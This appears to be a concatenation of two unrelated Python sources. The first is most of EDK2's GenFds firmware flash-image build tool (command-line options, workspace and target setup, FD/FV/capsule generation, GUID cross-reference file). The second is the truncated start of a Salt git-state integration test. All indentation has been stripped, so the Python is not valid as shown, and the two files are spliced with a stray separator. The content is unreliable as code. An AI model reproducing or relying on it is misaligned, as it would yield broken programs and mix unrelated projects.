EdkLogger.error("GenFds", PARAMETER_INVALID, "WORKSPACE is invalid",
ExtraData="Please use '-w' switch to pass it or set the WORKSPACE environment variable.")
else:
Workspace = os.path.normcase(FdsCommandDict.get("Workspace",os.environ.get('WORKSPACE')))
GenFdsGlobalVariable.WorkSpaceDir = Workspace
if 'EDK_SOURCE' in os.environ:
GenFdsGlobalVariable.EdkSourceDir = os.path.normcase(os.environ['EDK_SOURCE'])
if FdsCommandDict.get("debug"):
GenFdsGlobalVariable.VerboseLogger("Using Workspace:" + Workspace)
if FdsCommandDict.get("GenfdsMultiThread"):
GenFdsGlobalVariable.EnableGenfdsMultiThread = True
os.chdir(GenFdsGlobalVariable.WorkSpaceDir)
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(GenFdsGlobalVariable.WorkSpaceDir, PackagesPath)
if FdsCommandDict.get("fdf_file"):
FdfFilename = FdsCommandDict.get("fdf_file")[0].Path
FdfFilename = GenFdsGlobalVariable.ReplaceWorkspaceMacro(FdfFilename)
if FdfFilename[0:2] == '..':
FdfFilename = os.path.realpath(FdfFilename)
if not os.path.isabs(FdfFilename):
FdfFilename = mws.join(GenFdsGlobalVariable.WorkSpaceDir, FdfFilename)
if not os.path.exists(FdfFilename):
EdkLogger.error("GenFds", FILE_NOT_FOUND, ExtraData=FdfFilename)
GenFdsGlobalVariable.FdfFile = FdfFilename
GenFdsGlobalVariable.FdfFileTimeStamp = os.path.getmtime(FdfFilename)
else:
EdkLogger.error("GenFds", OPTION_MISSING, "Missing FDF filename")
if FdsCommandDict.get("build_target"):
GenFdsGlobalVariable.TargetName = FdsCommandDict.get("build_target")
if FdsCommandDict.get("toolchain_tag"):
GenFdsGlobalVariable.ToolChainTag = FdsCommandDict.get("toolchain_tag")
if FdsCommandDict.get("active_platform"):
ActivePlatform = FdsCommandDict.get("active_platform")
ActivePlatform = GenFdsGlobalVariable.ReplaceWorkspaceMacro(ActivePlatform)
if ActivePlatform[0:2] == '..':
ActivePlatform = os.path.realpath(ActivePlatform)
if not os.path.isabs (ActivePlatform):
ActivePlatform = mws.join(GenFdsGlobalVariable.WorkSpaceDir, ActivePlatform)
if not os.path.exists(ActivePlatform):
EdkLogger.error("GenFds", FILE_NOT_FOUND, "ActivePlatform doesn't exist!")
else:
EdkLogger.error("GenFds", OPTION_MISSING, "Missing active platform")
GlobalData.BuildOptionPcd = FdsCommandDict.get("OptionPcd") if FdsCommandDict.get("OptionPcd") else {}
GenFdsGlobalVariable.ActivePlatform = PathClass(NormPath(ActivePlatform))
if FdsCommandDict.get("conf_directory"):
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(FdsCommandDict.get("conf_directory"))
if ConfDirectoryPath.startswith('"'):
ConfDirectoryPath = ConfDirectoryPath[1:]
if ConfDirectoryPath.endswith('"'):
ConfDirectoryPath = ConfDirectoryPath[:-1]
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = os.path.join(GenFdsGlobalVariable.WorkSpaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.environ["CONF_PATH"])
else:
# Get standard WORKSPACE/Conf, use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(GenFdsGlobalVariable.WorkSpaceDir, 'Conf')
GenFdsGlobalVariable.ConfDir = ConfDirectoryPath
if not GlobalData.gConfDirectory:
GlobalData.gConfDirectory = GenFdsGlobalVariable.ConfDir
BuildConfigurationFile = os.path.normpath(os.path.join(ConfDirectoryPath, "target.txt"))
if os.path.isfile(BuildConfigurationFile) == True:
TargetTxt = TargetTxtClassObject()
TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
# if no build target given in command line, get it from target.txt
if not GenFdsGlobalVariable.TargetName:
BuildTargetList = TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]
if len(BuildTargetList) != 1:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID, ExtraData="Only allows one instance for Target.")
GenFdsGlobalVariable.TargetName = BuildTargetList[0]
# if no tool chain given in command line, get it from target.txt
if not GenFdsGlobalVariable.ToolChainTag:
ToolChainList = TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if ToolChainList is None or len(ToolChainList) == 0:
EdkLogger.error("GenFds", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.")
if len(ToolChainList) != 1:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID, ExtraData="Only allows one instance for ToolChain.")
GenFdsGlobalVariable.ToolChainTag = ToolChainList[0]
else:
EdkLogger.error("GenFds", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
#Set global flag for build mode
GlobalData.gIgnoreSource = FdsCommandDict.get("IgnoreSources")
if FdsCommandDict.get("macro"):
for Pair in FdsCommandDict.get("macro"):
if Pair.startswith('"'):
Pair = Pair[1:]
if Pair.endswith('"'):
Pair = Pair[:-1]
List = Pair.split('=')
if len(List) == 2:
if not List[1].strip():
EdkLogger.error("GenFds", OPTION_VALUE_INVALID, ExtraData="No Value given for Macro %s" %List[0])
if List[0].strip() == "EFI_SOURCE":
GlobalData.gEfiSource = List[1].strip()
GlobalData.gGlobalDefines["EFI_SOURCE"] = GlobalData.gEfiSource
continue
elif List[0].strip() == "EDK_SOURCE":
GlobalData.gEdkSource = List[1].strip()
GlobalData.gGlobalDefines["EDK_SOURCE"] = GlobalData.gEdkSource
continue
elif List[0].strip() in ["WORKSPACE", "TARGET", "TOOLCHAIN"]:
GlobalData.gGlobalDefines[List[0].strip()] = List[1].strip()
else:
GlobalData.gCommandLineDefines[List[0].strip()] = List[1].strip()
else:
GlobalData.gCommandLineDefines[List[0].strip()] = "TRUE"
os.environ["WORKSPACE"] = Workspace
# Use the -t and -b option as gGlobalDefines's TOOLCHAIN and TARGET if they are not defined
if "TARGET" not in GlobalData.gGlobalDefines:
GlobalData.gGlobalDefines["TARGET"] = GenFdsGlobalVariable.TargetName
if "TOOLCHAIN" not in GlobalData.gGlobalDefines:
GlobalData.gGlobalDefines["TOOLCHAIN"] = GenFdsGlobalVariable.ToolChainTag
if "TOOL_CHAIN_TAG" not in GlobalData.gGlobalDefines:
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = GenFdsGlobalVariable.ToolChainTag
"""call Workspace build create database"""
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
if WorkSpaceDataBase:
BuildWorkSpace = WorkSpaceDataBase
else:
BuildWorkSpace = WorkspaceDatabase()
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = DirCache(Workspace)
GlobalData.gWorkspace = Workspace
if FdsCommandDict.get("build_architecture_list"):
ArchList = FdsCommandDict.get("build_architecture_list").split(',')
else:
ArchList = BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, TAB_COMMON, FdsCommandDict.get("build_target"), FdsCommandDict.get("toolchain_tag")].SupArchList
TargetArchList = set(BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, TAB_COMMON, FdsCommandDict.get("build_target"), FdsCommandDict.get("toolchain_tag")].SupArchList) & set(ArchList)
if len(TargetArchList) == 0:
EdkLogger.error("GenFds", GENFDS_ERROR, "Target ARCH %s not in platform supported ARCH %s" % (str(ArchList), str(BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, TAB_COMMON].SupArchList)))
for Arch in ArchList:
GenFdsGlobalVariable.OutputDirFromDscDict[Arch] = NormPath(BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, Arch, FdsCommandDict.get("build_target"), FdsCommandDict.get("toolchain_tag")].OutputDirectory)
# assign platform name based on last entry in ArchList
GenFdsGlobalVariable.PlatformName = BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, ArchList[-1], FdsCommandDict.get("build_target"), FdsCommandDict.get("toolchain_tag")].PlatformName
if FdsCommandDict.get("platform_build_directory"):
OutputDirFromCommandLine = GenFdsGlobalVariable.ReplaceWorkspaceMacro(FdsCommandDict.get("platform_build_directory"))
if not os.path.isabs (OutputDirFromCommandLine):
OutputDirFromCommandLine = os.path.join(GenFdsGlobalVariable.WorkSpaceDir, OutputDirFromCommandLine)
for Arch in ArchList:
GenFdsGlobalVariable.OutputDirDict[Arch] = OutputDirFromCommandLine
else:
for Arch in ArchList:
GenFdsGlobalVariable.OutputDirDict[Arch] = os.path.join(GenFdsGlobalVariable.OutputDirFromDscDict[Arch], GenFdsGlobalVariable.TargetName + '_' + GenFdsGlobalVariable.ToolChainTag)
for Key in GenFdsGlobalVariable.OutputDirDict:
OutputDir = GenFdsGlobalVariable.OutputDirDict[Key]
if OutputDir[0:2] == '..':
OutputDir = os.path.realpath(OutputDir)
if OutputDir[1] != ':':
OutputDir = os.path.join (GenFdsGlobalVariable.WorkSpaceDir, OutputDir)
if not os.path.exists(OutputDir):
EdkLogger.error("GenFds", FILE_NOT_FOUND, ExtraData=OutputDir)
GenFdsGlobalVariable.OutputDirDict[Key] = OutputDir
""" Parse Fdf file, has to place after build Workspace as FDF may contain macros from DSC file """
if WorkSpaceDataBase:
FdfParserObj = GlobalData.gFdfParser
else:
FdfParserObj = FdfParser(FdfFilename)
FdfParserObj.ParseFile()
if FdfParserObj.CycleReferenceCheck():
EdkLogger.error("GenFds", FORMAT_NOT_SUPPORTED, "Cycle Reference Detected in FDF file")
if FdsCommandDict.get("fd"):
if FdsCommandDict.get("fd")[0].upper() in FdfParserObj.Profile.FdDict:
GenFds.OnlyGenerateThisFd = FdsCommandDict.get("fd")[0]
else:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID,
"No such an FD in FDF file: %s" % FdsCommandDict.get("fd")[0])
if FdsCommandDict.get("fv"):
if FdsCommandDict.get("fv")[0].upper() in FdfParserObj.Profile.FvDict:
GenFds.OnlyGenerateThisFv = FdsCommandDict.get("fv")[0]
else:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID,
"No such an FV in FDF file: %s" % FdsCommandDict.get("fv")[0])
if FdsCommandDict.get("cap"):
if FdsCommandDict.get("cap")[0].upper() in FdfParserObj.Profile.CapsuleDict:
GenFds.OnlyGenerateThisCap = FdsCommandDict.get("cap")[0]
else:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID,
"No such a Capsule in FDF file: %s" % FdsCommandDict.get("cap")[0])
GenFdsGlobalVariable.WorkSpace = BuildWorkSpace
if ArchList:
GenFdsGlobalVariable.ArchList = ArchList
# Dsc Build Data will handle Pcd Settings from CommandLine.
"""Modify images from build output if the feature of loading driver at fixed address is on."""
if GenFdsGlobalVariable.FixedLoadAddress:
GenFds.PreprocessImage(BuildWorkSpace, GenFdsGlobalVariable.ActivePlatform)
# Record the FV Region info that may specific in the FD
if FdfParserObj.Profile.FvDict and FdfParserObj.Profile.FdDict:
for FvObj in FdfParserObj.Profile.FvDict.values():
for FdObj in FdfParserObj.Profile.FdDict.values():
for RegionObj in FdObj.RegionList:
if RegionObj.RegionType != BINARY_FILE_TYPE_FV:
continue
for RegionData in RegionObj.RegionDataList:
if FvObj.UiFvName.upper() == RegionData.upper():
if FvObj.FvRegionInFD:
if FvObj.FvRegionInFD != RegionObj.Size:
EdkLogger.error("GenFds", FORMAT_INVALID, "The FV %s's region is specified in multiple FD with different value." %FvObj.UiFvName)
else:
FvObj.FvRegionInFD = RegionObj.Size
RegionObj.BlockInfoOfRegion(FdObj.BlockSizeList, FvObj)
"""Call GenFds"""
GenFds.GenFd('', FdfParserObj, BuildWorkSpace, ArchList)
"""Generate GUID cross reference file"""
GenFds.GenerateGuidXRefFile(BuildWorkSpace, ArchList, FdfParserObj)
"""Display FV space info."""
GenFds.DisplayFvSpaceInfo(FdfParserObj)
except Warning as X:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except FatalError as X:
if FdsCommandDict.get("debug") is not None:
import traceback
EdkLogger.quiet(traceback.format_exc())
ReturnCode = X.args[0]
except:
import traceback
EdkLogger.error(
"\nPython",
CODE_ERROR,
"Tools code failure",
ExtraData="Please send email to [email protected] for help, attaching following call stack trace!\n",
RaiseError=False
)
EdkLogger.quiet(traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
ClearDuplicatedInf()
return ReturnCode
def OptionsToCommandDict(Options):
FdsCommandDict = {}
FdsCommandDict["verbose"] = Options.verbose
FdsCommandDict["FixedAddress"] = Options.FixedAddress
FdsCommandDict["quiet"] = Options.quiet
FdsCommandDict["debug"] = Options.debug
FdsCommandDict["Workspace"] = Options.Workspace
FdsCommandDict["GenfdsMultiThread"] = Options.GenfdsMultiThread
FdsCommandDict["fdf_file"] = [PathClass(Options.filename)] if Options.filename else []
FdsCommandDict["build_target"] = Options.BuildTarget
FdsCommandDict["toolchain_tag"] = Options.ToolChain
FdsCommandDict["active_platform"] = Options.activePlatform
FdsCommandDict["OptionPcd"] = Options.OptionPcd
FdsCommandDict["conf_directory"] = Options.ConfDirectory
FdsCommandDict["IgnoreSources"] = Options.IgnoreSources
FdsCommandDict["macro"] = Options.Macros
FdsCommandDict["build_architecture_list"] = Options.archList
FdsCommandDict["platform_build_directory"] = Options.outputDir
FdsCommandDict["fd"] = [Options.uiFdName] if Options.uiFdName else []
FdsCommandDict["fv"] = [Options.uiFvName] if Options.uiFvName else []
FdsCommandDict["cap"] = [Options.uiCapName] if Options.uiCapName else []
return FdsCommandDict
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
#
def myOptionParser():
usage = "%prog [options] -f input_file -a arch_list -b build_target -p active_platform -t tool_chain_tag -D \"MacroName [= MacroValue]\""
Parser = OptionParser(usage=usage, description=__copyright__, version="%prog " + str(versionNumber))
Parser.add_option("-f", "--file", dest="filename", type="string", help="Name of FDF file to convert", action="callback", callback=SingleCheckCallback)
Parser.add_option("-a", "--arch", dest="archList", help="comma separated list containing one or more of: IA32, X64, IPF, ARM, AARCH64 or EBC which should be built, overrides target.txt?s TARGET_ARCH")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-p", "--platform", type="string", dest="activePlatform", help="Set the ACTIVE_PLATFORM, overrides target.txt ACTIVE_PLATFORM setting.",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-w", "--workspace", type="string", dest="Workspace", default=os.environ.get('WORKSPACE'), help="Set the WORKSPACE",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-o", "--outputDir", type="string", dest="outputDir", help="Name of Build Output directory",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-r", "--rom_image", dest="uiFdName", help="Build the image using the [FD] section named by FdUiName.")
Parser.add_option("-i", "--FvImage", dest="uiFvName", help="Build the FV image using the [FV] section named by UiFvName")
Parser.add_option("-C", "--CapsuleImage", dest="uiCapName", help="Build the Capsule image using the [Capsule] section named by UiCapName")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Set the build TARGET, overrides target.txt TARGET setting.",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-t", "--tagname", type="string", dest="ToolChain", help="Using the tools: TOOL_CHAIN_TAG name to build the platform.",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-s", "--specifyaddress", dest="FixedAddress", action="store_true", type=None, help="Specify driver load address.")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
Options, _ = Parser.parse_args()
return Options
## The class implementing the EDK2 flash image generation process
#
# This process includes:
# 1. Collect workspace information, includes platform and module information
# 2. Call methods of Fd class to generate FD
# 3. Call methods of Fv class to generate FV that not belong to FD
#
class GenFds(object):
FdfParsef = None
OnlyGenerateThisFd = None
OnlyGenerateThisFv = None
OnlyGenerateThisCap = None
## GenFd()
#
# @param OutputDir Output directory
# @param FdfParserObject FDF contents parser
# @param Workspace The directory of workspace
# @param ArchList The Arch list of platform
#
@staticmethod
def GenFd (OutputDir, FdfParserObject, WorkSpace, ArchList):
GenFdsGlobalVariable.SetDir ('', FdfParserObject, WorkSpace, ArchList)
GenFdsGlobalVariable.VerboseLogger(" Generate all Fd images and their required FV and Capsule images!")
if GenFds.OnlyGenerateThisCap is not None and GenFds.OnlyGenerateThisCap.upper() in GenFdsGlobalVariable.FdfParser.Profile.CapsuleDict:
CapsuleObj = GenFdsGlobalVariable.FdfParser.Profile.CapsuleDict[GenFds.OnlyGenerateThisCap.upper()]
if CapsuleObj is not None:
CapsuleObj.GenCapsule()
return
if GenFds.OnlyGenerateThisFd is not None and GenFds.OnlyGenerateThisFd.upper() in GenFdsGlobalVariable.FdfParser.Profile.FdDict:
FdObj = GenFdsGlobalVariable.FdfParser.Profile.FdDict[GenFds.OnlyGenerateThisFd.upper()]
if FdObj is not None:
FdObj.GenFd()
return
elif GenFds.OnlyGenerateThisFd is None and GenFds.OnlyGenerateThisFv is None:
for FdObj in GenFdsGlobalVariable.FdfParser.Profile.FdDict.values():
FdObj.GenFd()
GenFdsGlobalVariable.VerboseLogger("\n Generate other FV images! ")
if GenFds.OnlyGenerateThisFv is not None and GenFds.OnlyGenerateThisFv.upper() in GenFdsGlobalVariable.FdfParser.Profile.FvDict:
FvObj = GenFdsGlobalVariable.FdfParser.Profile.FvDict[GenFds.OnlyGenerateThisFv.upper()]
if FvObj is not None:
Buffer = BytesIO()
FvObj.AddToBuffer(Buffer)
Buffer.close()
return
elif GenFds.OnlyGenerateThisFv is None:
for FvObj in GenFdsGlobalVariable.FdfParser.Profile.FvDict.values():
Buffer = BytesIO('')
FvObj.AddToBuffer(Buffer)
Buffer.close()
if GenFds.OnlyGenerateThisFv is None and GenFds.OnlyGenerateThisFd is None and GenFds.OnlyGenerateThisCap is None:
if GenFdsGlobalVariable.FdfParser.Profile.CapsuleDict != {}:
GenFdsGlobalVariable.VerboseLogger("\n Generate other Capsule images!")
for CapsuleObj in GenFdsGlobalVariable.FdfParser.Profile.CapsuleDict.values():
CapsuleObj.GenCapsule()
if GenFdsGlobalVariable.FdfParser.Profile.OptRomDict != {}:
GenFdsGlobalVariable.VerboseLogger("\n Generate all Option ROM!")
for OptRomObj in GenFdsGlobalVariable.FdfParser.Profile.OptRomDict.values():
OptRomObj.AddToBuffer(None)
@staticmethod
def GenFfsMakefile(OutputDir, FdfParserObject, WorkSpace, ArchList, GlobalData):
GenFdsGlobalVariable.SetEnv(FdfParserObject, WorkSpace, ArchList, GlobalData)
for FdObj in GenFdsGlobalVariable.FdfParser.Profile.FdDict.values():
FdObj.GenFd(Flag=True)
for FvObj in GenFdsGlobalVariable.FdfParser.Profile.FvDict.values():
FvObj.AddToBuffer(Buffer=None, Flag=True)
if GenFdsGlobalVariable.FdfParser.Profile.OptRomDict != {}:
for OptRomObj in GenFdsGlobalVariable.FdfParser.Profile.OptRomDict.values():
OptRomObj.AddToBuffer(Buffer=None, Flag=True)
return GenFdsGlobalVariable.FfsCmdDict
## GetFvBlockSize()
#
# @param FvObj Whose block size to get
# @retval int Block size value
#
@staticmethod
def GetFvBlockSize(FvObj):
DefaultBlockSize = 0x1
FdObj = None
if GenFds.OnlyGenerateThisFd is not None and GenFds.OnlyGenerateThisFd.upper() in GenFdsGlobalVariable.FdfParser.Profile.FdDict:
FdObj = GenFdsGlobalVariable.FdfParser.Profile.FdDict[GenFds.OnlyGenerateThisFd.upper()]
if FdObj is None:
for ElementFd in GenFdsGlobalVariable.FdfParser.Profile.FdDict.values():
for ElementRegion in ElementFd.RegionList:
if ElementRegion.RegionType == BINARY_FILE_TYPE_FV:
for ElementRegionData in ElementRegion.RegionDataList:
if ElementRegionData is not None and ElementRegionData.upper() == FvObj.UiFvName:
if FvObj.BlockSizeList != []:
return FvObj.BlockSizeList[0][0]
else:
return ElementRegion.BlockSizeOfRegion(ElementFd.BlockSizeList)
if FvObj.BlockSizeList != []:
return FvObj.BlockSizeList[0][0]
return DefaultBlockSize
else:
for ElementRegion in FdObj.RegionList:
if ElementRegion.RegionType == BINARY_FILE_TYPE_FV:
for ElementRegionData in ElementRegion.RegionDataList:
if ElementRegionData is not None and ElementRegionData.upper() == FvObj.UiFvName:
if FvObj.BlockSizeList != []:
return FvObj.BlockSizeList[0][0]
else:
return ElementRegion.BlockSizeOfRegion(ElementFd.BlockSizeList)
return DefaultBlockSize
## DisplayFvSpaceInfo()
#
# @param FvObj Whose block size to get
# @retval None
#
@staticmethod
def DisplayFvSpaceInfo(FdfParserObject):
FvSpaceInfoList = []
MaxFvNameLength = 0
for FvName in FdfParserObject.Profile.FvDict:
if len(FvName) > MaxFvNameLength:
MaxFvNameLength = len(FvName)
FvSpaceInfoFileName = os.path.join(GenFdsGlobalVariable.FvDir, FvName.upper() + '.Fv.map')
if os.path.exists(FvSpaceInfoFileName):
FileLinesList = getlines(FvSpaceInfoFileName)
TotalFound = False
Total = ''
UsedFound = False
Used = ''
FreeFound = False
Free = ''
for Line in FileLinesList:
NameValue = Line.split('=')
if len(NameValue) == 2:
if NameValue[0].strip() == 'EFI_FV_TOTAL_SIZE':
TotalFound = True
Total = NameValue[1].strip()
if NameValue[0].strip() == 'EFI_FV_TAKEN_SIZE':
UsedFound = True
Used = NameValue[1].strip()
if NameValue[0].strip() == 'EFI_FV_SPACE_SIZE':
FreeFound = True
Free = NameValue[1].strip()
if TotalFound and UsedFound and FreeFound:
FvSpaceInfoList.append((FvName, Total, Used, Free))
GenFdsGlobalVariable.InfLogger('\nFV Space Information')
for FvSpaceInfo in FvSpaceInfoList:
Name = FvSpaceInfo[0]
TotalSizeValue = long(FvSpaceInfo[1], 0)
UsedSizeValue = long(FvSpaceInfo[2], 0)
FreeSizeValue = long(FvSpaceInfo[3], 0)
if UsedSizeValue == TotalSizeValue:
Percentage = '100'
else:
Percentage = str((UsedSizeValue + 0.0) / TotalSizeValue)[0:4].lstrip('0.')
GenFdsGlobalVariable.InfLogger(Name + ' ' + '[' + Percentage + '%Full] ' + str(TotalSizeValue) + ' total, ' + str(UsedSizeValue) + ' used, ' + str(FreeSizeValue) + ' free')
## PreprocessImage()
#
# @param BuildDb Database from build meta data files
# @param DscFile modules from dsc file will be preprocessed
# @retval None
#
@staticmethod
def PreprocessImage(BuildDb, DscFile):
PcdDict = BuildDb.BuildObject[DscFile, TAB_COMMON, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag].Pcds
PcdValue = ''
for Key in PcdDict:
PcdObj = PcdDict[Key]
if PcdObj.TokenCName == 'PcdBsBaseAddress':
PcdValue = PcdObj.DefaultValue
break
if PcdValue == '':
return
Int64PcdValue = long(PcdValue, 0)
if Int64PcdValue == 0 or Int64PcdValue < -1:
return
TopAddress = 0
if Int64PcdValue > 0:
TopAddress = Int64PcdValue
ModuleDict = BuildDb.BuildObject[DscFile, TAB_COMMON, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag].Modules
for Key in ModuleDict:
ModuleObj = BuildDb.BuildObject[Key, TAB_COMMON, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag]
print(ModuleObj.BaseName + ' ' + ModuleObj.ModuleType)
@staticmethod
def GenerateGuidXRefFile(BuildDb, ArchList, FdfParserObj):
GuidXRefFileName = os.path.join(GenFdsGlobalVariable.FvDir, "Guid.xref")
GuidXRefFile = BytesIO('')
PkgGuidDict = {}
GuidDict = {}
ModuleList = []
FileGuidList = []
for Arch in ArchList:
PlatformDataBase = BuildDb.BuildObject[GenFdsGlobalVariable.ActivePlatform, Arch, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag]
PkgList = GenFdsGlobalVariable.WorkSpace.GetPackageList(GenFdsGlobalVariable.ActivePlatform, Arch, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag)
for P in PkgList:
PkgGuidDict.update(P.Guids)
for Name, Guid in PlatformDataBase.Pcds:
Pcd = PlatformDataBase.Pcds[Name, Guid]
if Pcd.Type in [TAB_PCDS_DYNAMIC_HII, TAB_PCDS_DYNAMIC_EX_HII]:
for SkuId in Pcd.SkuInfoList:
Sku = Pcd.SkuInfoList[SkuId]
if Sku.VariableGuid and Sku.VariableGuid in PkgGuidDict.keys():
GuidDict[Sku.VariableGuid] = PkgGuidDict[Sku.VariableGuid]
for ModuleFile in PlatformDataBase.Modules:
Module = BuildDb.BuildObject[ModuleFile, Arch, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag]
if Module in ModuleList:
continue
else:
ModuleList.append(Module)
if GlobalData.gGuidPattern.match(ModuleFile.BaseName):
GuidXRefFile.write("%s %s\n" % (ModuleFile.BaseName, Module.BaseName))
else:
GuidXRefFile.write("%s %s\n" % (Module.Guid, Module.BaseName))
GuidDict.update(Module.Protocols)
GuidDict.update(Module.Guids)
GuidDict.update(Module.Ppis)
for FvName in FdfParserObj.Profile.FvDict:
for FfsObj in FdfParserObj.Profile.FvDict[FvName].FfsList:
if not isinstance(FfsObj, FileStatement):
InfPath = PathClass(NormPath(mws.join(GenFdsGlobalVariable.WorkSpaceDir, FfsObj.InfFileName)))
FdfModule = BuildDb.BuildObject[InfPath, Arch, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag]
if FdfModule in ModuleList:
continue
else:
ModuleList.append(FdfModule)
GuidXRefFile.write("%s %s\n" % (FdfModule.Guid, FdfModule.BaseName))
GuidDict.update(FdfModule.Protocols)
GuidDict.update(FdfModule.Guids)
GuidDict.update(FdfModule.Ppis)
else:
FileStatementGuid = FfsObj.NameGuid
if FileStatementGuid in FileGuidList:
continue
else:
FileGuidList.append(FileStatementGuid)
Name = []
FfsPath = os.path.join(GenFdsGlobalVariable.FvDir, 'Ffs')
FfsPath = glob(os.path.join(FfsPath, FileStatementGuid) + TAB_STAR)
if not FfsPath:
continue
if not os.path.exists(FfsPath[0]):
continue
MatchDict = {}
ReFileEnds = compile('\S+(.ui)$|\S+(fv.sec.txt)$|\S+(.pe32.txt)$|\S+(.te.txt)$|\S+(.pic.txt)$|\S+(.raw.txt)$|\S+(.ffs.txt)$')
FileList = os.listdir(FfsPath[0])
for File in FileList:
Match = ReFileEnds.search(File)
if Match:
for Index in range(1, 8):
if Match.group(Index) and Match.group(Index) in MatchDict:
MatchDict[Match.group(Index)].append(File)
elif Match.group(Index):
MatchDict[Match.group(Index)] = [File]
if not MatchDict:
continue
if '.ui' in MatchDict:
for File in MatchDict['.ui']:
with open(os.path.join(FfsPath[0], File), 'rb') as F:
F.read()
length = F.tell()
F.seek(4)
TmpStr = unpack('%dh' % ((length - 4) / 2), F.read())
Name = ''.join(chr(c) for c in TmpStr[:-1])
else:
FileList = []
if 'fv.sec.txt' in MatchDict:
FileList = MatchDict['fv.sec.txt']
elif '.pe32.txt' in MatchDict:
FileList = MatchDict['.pe32.txt']
elif '.te.txt' in MatchDict:
FileList = MatchDict['.te.txt']
elif '.pic.txt' in MatchDict:
FileList = MatchDict['.pic.txt']
elif '.raw.txt' in MatchDict:
FileList = MatchDict['.raw.txt']
elif '.ffs.txt' in MatchDict:
FileList = MatchDict['.ffs.txt']
else:
pass
for File in FileList:
with open(os.path.join(FfsPath[0], File), 'r') as F:
Name.append((F.read().split()[-1]))
if not Name:
continue
Name = ' '.join(Name) if isinstance(Name, type([])) else Name
GuidXRefFile.write("%s %s\n" %(FileStatementGuid, Name))
# Append GUIDs, Protocols, and PPIs to the Xref file
GuidXRefFile.write("\n")
for key, item in GuidDict.items():
GuidXRefFile.write("%s %s\n" % (GuidStructureStringToGuidString(item).upper(), key))
if GuidXRefFile.getvalue():
SaveFileOnChange(GuidXRefFileName, GuidXRefFile.getvalue(), False)
GenFdsGlobalVariable.InfLogger("\nGUID cross reference file can be found at %s" % GuidXRefFileName)
elif os.path.exists(GuidXRefFileName):
os.remove(GuidXRefFileName)
GuidXRefFile.close()
if __name__ == '__main__':
r = main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127:
r = 1
exit(r)
|
|
# -*- coding: utf-8 -*-
'''
Tests for the Git state
'''
# Import python libs
from __future__ import absolute_import
import os
import shutil
import socket
import subprocess
import tempfile
# Import Salt Testing libs
from salttesting.helpers import ensure_in_syspath, skip_if_binaries_missing
ensure_in_syspath('../../')
# Import salt libs
import integration
import salt.utils
class GitTest(integration.ModuleCase, integration.SaltReturnAssertsMixIn):
'''
Validate the git state
'''
def setUp(self):
super(GitTest, self).setUp()
self.__domain = 'github.com'
try:
if hasattr(socket, 'setdefaulttimeout'):
# 10 second dns timeout
socket.setdefaulttimeout(10)
socket.gethostbyname(self.__domain)
except socket.error:
msg = 'error resolving {0}, possible network issue?'
